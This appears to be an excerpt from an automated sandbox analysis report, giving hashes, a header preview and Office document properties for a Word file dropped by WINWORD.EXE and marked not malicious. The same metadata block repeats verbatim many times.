                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
